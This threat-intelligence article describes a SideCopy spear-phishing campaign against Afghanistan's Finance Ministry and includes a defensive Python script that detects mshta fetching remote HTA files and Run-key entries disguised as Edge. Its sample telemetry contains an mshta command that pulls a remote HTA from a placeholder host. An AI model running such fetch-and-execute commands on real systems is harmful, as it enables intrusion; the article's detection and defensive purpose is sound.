
Analysis of SideCopy Threat Actor Surveillance Against the Afghan Finance Ministry

Security researchers have detailed an ongoing espionage campaign by the SideCopy threat group targeting Afghanistan's Ministry of Finance. This assessment outlines the threat actor's methodology, including their use of localized decoys and compromised sovereign infrastructure to deploy remote access tools.

Triage Security Media Team

An advanced persistent threat (APT) group linked to Pakistan has been conducting unauthorized monitoring of Afghanistan's government finance infrastructure. The campaign targets personnel ranging from the Ministry of Finance down to provincial government employees.

Contrary to common assumptions about the region, Afghanistan maintains a substantial digital footprint. Researchers from Seqrite observed that the government operates interconnected ministry portals, educational institutions, regulatory bodies, and administrative services, an ecosystem that must be defended against the same widespread threats facing any connected state.

Since at least May 2025, the threat actor known as SideCopy has targeted the Afghan Ministry of Finance. SideCopy operates under the broader Transparent Tribe (APT36) umbrella, a group frequently attributed to the Pakistani state and known for targeting neighboring countries.

Execution sequence and methodology

The methodology observed in this campaign relies on established techniques. The sequence begins with spear-phishing emails carrying ZIP archives. Each archive contains a malicious LNK shortcut disguised as a PDF. When opened, the LNK invokes the legitimate Windows utility mshta.exe to fetch a remote HTA script, which is decoded and executed in memory. A series of loaders follows, after which the threat actor establishes persistence through a Windows registry entry named to pass as a Microsoft Edge component.
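The chain above leaves two telemetry signals a defender can key on: mshta.exe being handed a remote (HTTP or UNC) HTA, and a Run-key value whose name or binary borrows an Edge name while its executable lives outside Edge's default install directories. The following detection sketch is an added example, not Seqrite's tooling or anything recovered from the campaign. The event records are constructed to resemble Sysmon process-create (Event ID 1) and registry-value-set (Event ID 13) fields, the hostnames, user paths and the `hta.example.invalid` URL are invented, and the list of legitimate Edge directories is an assumption based on default install locations.

```python
"""Detect an LNK -> mshta -> remote HTA launch and an Edge-named Run-key
persistence entry, then correlate both stages per host.

Added example; event layout and sample data are constructed, not real logs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


# Assumed default Edge install prefixes (lower-case, trailing backslash).
# An "Edge" binary that starts anywhere else (user profile, temp) is suspect.
EDGE_DIRS = (
    "c:\\program files (x86)\\microsoft\\edge\\",
    "c:\\program files\\microsoft\\edge\\",
    "c:\\program files (x86)\\microsoft\\edgeupdate\\",
)
REMOTE = re.compile(r"(https?://|ftp://|\\\\[^\\\s]+\\)", re.I)  # URL or UNC path
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.I)
EXE_IN_DATA = re.compile(r'^\s*"([^"]+)"|^\s*(\S+)')  # quoted path or first token

# Constructed sample telemetry modelled on Sysmon EID 1 / EID 13 fields.
EVENTS = [
    {"id": 1, "host": "mof-ws-17", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://hta.example.invalid/mof/staff.hta'},
    {"id": 13, "host": "mof-ws-17",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
     "details": r'"C:\Users\k.ahmadi\AppData\Roaming\EdgeUpdate\msedge.exe"'},
    # Benign: local HTA launched by an installer, and an ordinary OneDrive Run value.
    {"id": 1, "host": "mof-ws-03", "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
    {"id": 13, "host": "mof-ws-03",
     "target": r"HKU\S-1-5-21-2\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r'"C:\Users\a.noor\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    # Benign: genuine Edge auto-launch entry under the default install path.
    {"id": 13, "host": "mof-ws-08",
     "target": r"HKU\S-1-5-21-3\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_1",
     "details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
]


def first_path(value: str) -> str:
    """Return the executable path from registry data (quoted or first token)."""
    m = EXE_IN_DATA.match(value)
    return (m.group(1) or m.group(2)).lower() if m else ""


def rule_mshta_remote(ev: dict):
    """mshta.exe given a URL or UNC target; explorer.exe parent hints at an LNK."""
    if ev["id"] != 1 or not ev["image"].lower().endswith("\\mshta.exe"):
        return None
    if not REMOTE.search(ev["cmdline"]):
        return None
    via_shell = ev.get("parent_image", "").lower().endswith("\\explorer.exe")
    prefix = "explorer-> " if via_shell else ""
    return Finding("mshta_remote_hta", ev["host"], prefix + ev["cmdline"])


def rule_edge_masquerade_run(ev: dict):
    """Run/RunOnce value that looks like Edge but points outside Edge's directories."""
    if ev["id"] != 13 or not RUN_KEY.search(ev["target"]):
        return None
    value_name = ev["target"].rsplit("\\", 1)[-1].lower()
    exe = first_path(ev["details"])
    if "edge" not in value_name and "edge" not in exe.rsplit("\\", 1)[-1]:
        return None
    if any(exe.startswith(d) for d in EDGE_DIRS):
        return None
    return Finding("run_key_edge_masquerade", ev["host"], f"{value_name} -> {exe}")


RULES = (rule_mshta_remote, rule_edge_masquerade_run)


def detect(events: list) -> list:
    """Run every rule over every event and collect the findings."""
    return [f for ev in events for f in (r(ev) for r in RULES) if f]


def correlate(findings: list) -> list:
    """Hosts where every stage fired: the strongest signal for this chain."""
    by_host: dict = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, seen in by_host.items() if len(seen) == len(RULES))


if __name__ == "__main__":
    found = detect(EVENTS)
    for f in found:
        print(f"[{f.rule}] {f.host}: {f.detail}")
    print("hosts with full chain:", correlate(EVENTS and found))
```

The two rules are deliberately independent so either stage alone still surfaces, and `correlate` is what you would page on: a host where mshta pulled a remote HTA and an Edge-named Run value appeared outside Edge's install tree matches the chain this campaign uses. The Edge-directory allowlist is the part to adapt to your estate; unquoted paths with spaces in registry data need the usual splitting care as well.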

The final payload in this sequence is Xeno RAT, an open-source remote access trojan. In this instance, the threat actor built it with a hardcoded command-and-control (C2) domain hosted on bulletproof infrastructure in Bulgaria.

The threat actors tailored their approach specifically for the affected personnel. The LNK file and the subsequent decoy document were written in Pashto, the native language of Afghanistan's largest ethnic group. The decoy presented a realistic Afghan Ministry of Finance staff directory, complete with names and mobile numbers for high-ranking officials across the country's 34 provinces.

Infrastructure blending and operational security

A notable element of this campaign is how the threat actor blended their unauthorized traffic with legitimate state activity. The remote script was hosted on a compromised domain within the IP address space of Afghanistan's Ministry of Communication and Information Technology.

By routing their traffic through sovereign government infrastructure—alongside more than 200 legitimate education and state websites—the group demonstrated a deliberate approach to defense evasion. Seqrite researchers note that while the operation does not introduce new malware techniques, its sophisticated execution and targeting show a mature approach to operational security.

Cybersecurity resilience in a transitioning infrastructure

Following the governmental transition in 2021, the current administration inherited a network of mobile, fiber optic, and telecommunications infrastructure initially developed through foreign aid and investment over two decades. This included administrative networks like those used by the Finance Ministry, biometric databases, and various security and surveillance systems.

Protecting this inherited digital environment presents substantial challenges. Seqrite researchers identify economic isolation, limited access to international cybersecurity partnerships, and difficulties retaining skilled personnel as factors constraining the country's technology modernization. These environmental constraints limit the ability to monitor and patch systems effectively, creating conditions where threat actors can establish long-term access and conduct espionage with a lower probability of detection.